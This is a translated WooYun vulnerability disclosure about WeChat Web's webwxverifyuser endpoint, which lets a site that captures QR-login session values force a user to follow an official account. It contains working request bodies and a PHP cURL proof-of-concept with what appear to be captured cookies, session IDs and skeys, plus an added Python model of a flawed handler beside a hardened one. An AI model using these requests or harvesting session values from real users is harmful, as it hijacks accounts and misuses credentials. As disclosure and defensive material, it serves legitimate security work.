
WeChat: users can be forced to follow an official account

2015-12-27 04:00

A design error in WeChat lets a user be forced to follow an official account (公众号).

Vulnerability details:

Step one of the test: log in to WeChat Web (微信网页版).

Then forward a "follow this official account" link into the session.

Found the endpoint https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser

Clicking "add friend" after that had no visible effect,

but parameters were still being sent to the endpoint.



A forced follow works as follows; it is enough to send the parameters below. In the request, (微信用户值)/(用户值) stand for the logged-in user's own session values and (公众号加密值) for the official account's encrypted identifier:

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号加密值)","VerifyUserTicket":"(公众号加密值)"}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}

All of the (用户值) user values can be obtained through WeChat QR-code login: as long as you scan to log in to my website, I can make that WeChat account forcibly follow an official account.

The (公众号加密值) encrypted official-account value is obtained from this endpoint: https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(微信的用户值)&skey=(微信的用户值)

Final testing found that the following request also works, with the official account's plain WeChat ID (公众号的微信号) in Value and an empty VerifyUserTicket: https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号的微信号)","VerifyUserTicket":""}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}





Conditions for a forced follow: 1. the victim scans to log in to my website; 2. the WeChat ID of the official account to be force-followed is known.
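As an added, defender-side illustration (not code from the report, from WooYun or from WeChat), the following Python models the server-side check the report shows being bypassed: a permissive handler that, when VerifyUserTicket is empty, trusts Value as a plain account name and follows it, beside a hardened handler that requires a present ticket, an opaque target id, and an HMAC binding of the ticket to the authenticated session and the target. The HMAC construction, the secret, the session id and the request values are constructed assumptions; only the request field names and the "v1_...@stranger" ticket shape come from the report.

```python
import hashlib
import hmac
import json

# Constructed demo secret; a real service would keep this in a key store.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def issue_ticket(session_sid: str, opaque_id: str) -> str:
    """Mint a VerifyUserTicket bound to the caller's session and the target.

    The 'v1_<hex>@stranger' shape mirrors the ticket in the report; binding it
    with an HMAC over (session, target) is an assumed design, not WeChat's.
    """
    msg = f"{session_sid}|{opaque_id}".encode()
    mac = hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()
    return f"v1_{mac}@stranger"


def _parse(body: str):
    """Return (Sid echoed in the body, VerifyUserList) for an Opcode-1 request."""
    req = json.loads(body)
    if req.get("Opcode") != 1:
        return None, []
    return req["BaseRequest"].get("Sid"), req.get("VerifyUserList", [])


def verify_user_permissive(body: str) -> list:
    """Models the flaw the report describes: an empty ticket is treated as a
    direct follow by account name, so the ticket check is skipped entirely."""
    sid, entries = _parse(body)
    followed = []
    for e in entries:
        value, ticket = e.get("Value", ""), e.get("VerifyUserTicket", "")
        if ticket == "":
            followed.append(value)  # BUG: no proof the user ever saw this target
        elif ticket.isascii() and hmac.compare_digest(ticket, issue_ticket(sid, value)):
            followed.append(value)
    return followed


def verify_user_hardened(body: str, session_sid: str) -> list:
    """Follows only entries with a present ticket, an opaque '@...' target id,
    and a ticket that verifies against the server-side authenticated session
    (session_sid), never against the Sid the client echoes in the body."""
    _, entries = _parse(body)
    followed = []
    for e in entries:
        value, ticket = e.get("Value", ""), e.get("VerifyUserTicket", "")
        if not ticket or not ticket.isascii() or not value.startswith("@"):
            continue  # empty ticket or plain account name: reject
        if hmac.compare_digest(ticket, issue_ticket(session_sid, value)):
            followed.append(value)
    return followed


def constructed_request(value: str, ticket: str, sid: str = "SESSION-SID-DEMO") -> str:
    """Build a request body with the field layout shown in the report (constructed values)."""
    return json.dumps({
        "BaseRequest": {"Uin": 0, "Sid": sid, "Skey": "demo-skey", "DeviceID": "demo-device"},
        "Opcode": 1,
        "VerifyUserListSize": 1,
        "VerifyUserList": [{"Value": value, "VerifyUserTicket": ticket}],
        "VerifyContent": "hello",
        "SceneListCount": 1,
        "SceneList": [33],
    })


if __name__ == "__main__":
    sid = "SESSION-SID-DEMO"
    empty_ticket = constructed_request("plain-account-name", "", sid)
    print("permissive:", verify_user_permissive(empty_ticket))     # follows it
    print("hardened:  ", verify_user_hardened(empty_ticket, sid))  # rejects it
    target = "@constructed-opaque-id"
    good = constructed_request(target, issue_ticket(sid, target), sid)
    print("hardened, valid ticket:", verify_user_hardened(good, sid))
```

The hardened handler takes the session id from the server's own session state rather than from BaseRequest.Sid, so a ticket minted for one session cannot be replayed from another, and a plain account name with no ticket is dropped before any comparison happens.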







To stress once more how the user values are obtained: a website that integrates WeChat QR-code login receives the user values above. This vulnerability really does exist.





After a day of testing, I could make one WeChat account forcibly follow roughly 20 official accounts.





<?php
// Request headers captured from a logged-in WeChat Web session (values as posted by the author).
$header = array(
    'Host: wx2.qq.com',
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',
    'Accept: application/json, text/plain, */*',
    'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding: gzip, deflate',
    'DNT: 1',
    'Content-Type: application/json;charset=utf-8',
    'Referer: https://wx2.qq.com/',
    'Cookie: wxuin=2330616138; webwxuvid=cab5317930f5335a8994ade9a8160d9a0c1e843e1bd24ff03ab254c91d4ea3a8ec31a98c8d9adb6087cf6e9043d53c58; pgv_pvi=3286183936; pgv_pvid=8255006950; pgv_info=ssid=s2371423939; pgv_si=s1581726720; wxsid=hBgpWPQeDRDVm3Rc; wxloadtime=1444359620_expired; mm_lang=zh_CN; webwx_data_ticket=AQaRtHUZKZBvZZR2FeXCn5pg; MM_WX_NOTIFY_STATE=1; MM_WX_SOUND_STATE=1; wxpluginkey=1444352949',
    'Connection: keep-alive',
);

// Request body: Opcode 1 with the official account's plain WeChat ID in Value
// and an empty VerifyUserTicket (the case the text above says still works).
$data = '{"BaseRequest":{"Uin":2330616138,"Sid":"hBgpWPQeDRDVm3Rc","Skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4","DeviceID":"e589828811516427"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"gopartygo","VerifyUserTicket":""}],"VerifyContent":"我是123456789","SceneListCount":1,"SceneList":[33],"skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4"}';

// POST the JSON body to the webwxverifyuser endpoint with the captured headers.
$ch = curl_init("http://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444361009023");
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_HEADER, 1);            // include response headers in the result
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the response instead of printing it
$b = curl_exec($ch);
curl_close($ch);







The above is PHP code. For the user values inside it, scan to log in to WeChat Web, capture them manually, put them in and run it.

That should be enough supplementary material!!! I've sent you the code; I can't take screenshots for you, video would be possible but I can't be bothered to record it.











Proof of vulnerability:

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300

{"BaseRequest":{"Uin":2330616138,"Sid":"Ix4w3k0gAVg1T5SW","Skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296","DeviceID":"e426131629909286"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"@888d1b21d2fe80dafe922ed50723874b","VerifyUserTicket":"v1_92c7ceebbd2a799f06c7e5f97fd352c5c040d63b8c40ec055b6968f5068860d3@stranger"}],"VerifyContent":"我是123456789","SceneListCount":10,"SceneList":[33],"skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296"}

Fix:

WeChat has its own experts; I won't talk nonsense.

Source: www.wooyun.org/bugs/wooyun-2015-0150266
